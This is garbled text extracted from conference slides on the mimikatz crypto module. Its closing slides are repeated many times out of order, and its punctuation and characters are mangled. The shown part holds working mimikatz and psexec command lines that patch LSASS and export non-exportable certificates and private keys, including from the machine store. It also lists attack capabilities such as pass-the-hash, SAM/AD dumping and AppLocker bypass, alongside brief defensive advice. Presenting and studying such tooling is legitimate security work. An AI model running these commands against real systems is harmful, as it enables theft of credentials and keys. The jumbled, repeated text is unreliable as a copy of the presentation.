mimikatz crypto what we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basics ndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depth ndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSP bull Their biometrics stuff was a little buggy )
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basics ndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depth ndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSP bull Their biometrics stuff was a little buggy )
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54 54
mimikatz what else can it do
mimikatz what else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driver ndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driver ndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55 55
mimikatz thatrsquos all folks
mimikatz thatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunity bull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challenges bull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunity bull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challenges bull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56 56
Blog Source Code amp Contact Blog Source Code amp Contact
blog httpbloggentilkiwicom mimikatz httpbloggentilkiwicommimikatz source httpscodegooglecompmimikatz email benjamingentilkiwicom
blog httpbloggentilkiwicom mimikatz httpbloggentilkiwicommimikatz source httpscodegooglecompmimikatz email benjamingentilkiwicom
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57 57
mimikatz crypto patchcng bonus
mimikatz crypto patchcng bonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52 52
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfx MY ================ Certificat 1 ================ [hellip] Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Fournisseur = Microsoft Software Key Storage Provider La cleacute priveacutee NE PEUT PAS ecirctre exporteacutee Succegraves du test de chiffrement CertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813) CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfx MY ================ Certificat 1 ================ [hellip] Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Fournisseur = Microsoft Software Key Storage Provider Succegraves du test de chiffrement CertUtil -exportPFX La commande sest termineacutee correctement
mimikatz crypto memo
mimikatz crypto memo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keys ndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keys ndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53 53
mimikatz crypto what we can do
mimikatz crypto what we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basics ndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depth ndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSP bull Their biometrics stuff was a little buggy )
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basics ndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depth ndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSP bull Their biometrics stuff was a little buggy )
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54 54
mimikatz what else can it do
mimikatz what else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driver ndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driver ndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55 55
mimikatz thatrsquos all folks
mimikatz thatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunity bull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challenges bull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunity bull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challenges bull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56 56
Blog Source Code amp Contact Blog Source Code amp Contact
blog httpbloggentilkiwicom mimikatz httpbloggentilkiwicommimikatz source httpscodegooglecompmimikatz email benjamingentilkiwicom
blog httpbloggentilkiwicom mimikatz httpbloggentilkiwicommimikatz source httpscodegooglecompmimikatz email benjamingentilkiwicom
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57 57
mimikatz crypto memo
mimikatz crypto memo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keys ndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keys ndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53 53
mimikatz crypto what we can do
mimikatz crypto what we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basics ndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depth ndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSP bull Their biometrics stuff was a little buggy )
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basics ndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depth ndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSP bull Their biometrics stuff was a little buggy )
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54 54
mimikatz what else can it do
mimikatz what else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driver ndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driver ndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55 55
mimikatz thatrsquos all folks
mimikatz thatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunity bull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challenges bull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunity bull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challenges bull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56 56
Blog Source Code amp Contact Blog Source Code amp Contact
blog httpbloggentilkiwicom mimikatz httpbloggentilkiwicommimikatz source httpscodegooglecompmimikatz email benjamingentilkiwicom
blog httpbloggentilkiwicom mimikatz httpbloggentilkiwicommimikatz source httpscodegooglecompmimikatz email benjamingentilkiwicom
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57 57
mimikatz crypto what we can do
mimikatz crypto what we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basics ndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depth ndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSP bull Their biometrics stuff was a little buggy )
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basics ndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depth ndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSP bull Their biometrics stuff was a little buggy )
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54 54
mimikatz what else can it do
mimikatz what else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driver ndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driver ndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55 55
mimikatz thatrsquos all folks
mimikatz thatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunity bull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challenges bull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunity bull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challenges bull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56 56
Blog Source Code amp Contact Blog Source Code amp Contact
blog httpbloggentilkiwicom mimikatz httpbloggentilkiwicommimikatz source httpscodegooglecompmimikatz email benjamingentilkiwicom
blog httpbloggentilkiwicom mimikatz httpbloggentilkiwicommimikatz source httpscodegooglecompmimikatz email benjamingentilkiwicom
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57 57
mimikatz what else can it do
mimikatz what else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driver ndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driver ndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55 55
mimikatz thatrsquos all folks
mimikatz thatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunity bull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challenges bull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunity bull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challenges bull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56 56
Blog Source Code amp Contact Blog Source Code amp Contact
blog httpbloggentilkiwicom mimikatz httpbloggentilkiwicommimikatz source httpscodegooglecompmimikatz email benjamingentilkiwicom
blog httpbloggentilkiwicom mimikatz httpbloggentilkiwicommimikatz source httpscodegooglecompmimikatz email benjamingentilkiwicom
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57 57
mimikatz thatrsquos all folks
mimikatz thatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunity bull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challenges bull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunity bull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challenges bull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56 56
Blog Source Code amp Contact Blog Source Code amp Contact
blog httpbloggentilkiwicom mimikatz httpbloggentilkiwicommimikatz source httpscodegooglecompmimikatz email benjamingentilkiwicom
blog httpbloggentilkiwicom mimikatz httpbloggentilkiwicommimikatz source httpscodegooglecompmimikatz email benjamingentilkiwicom
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57 57
Blog Source Code amp Contact Blog Source Code amp Contact
blog httpbloggentilkiwicom mimikatz httpbloggentilkiwicommimikatz source httpscodegooglecompmimikatz email benjamingentilkiwicom
blog httpbloggentilkiwicom mimikatz httpbloggentilkiwicommimikatz source httpscodegooglecompmimikatz email benjamingentilkiwicom
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57 57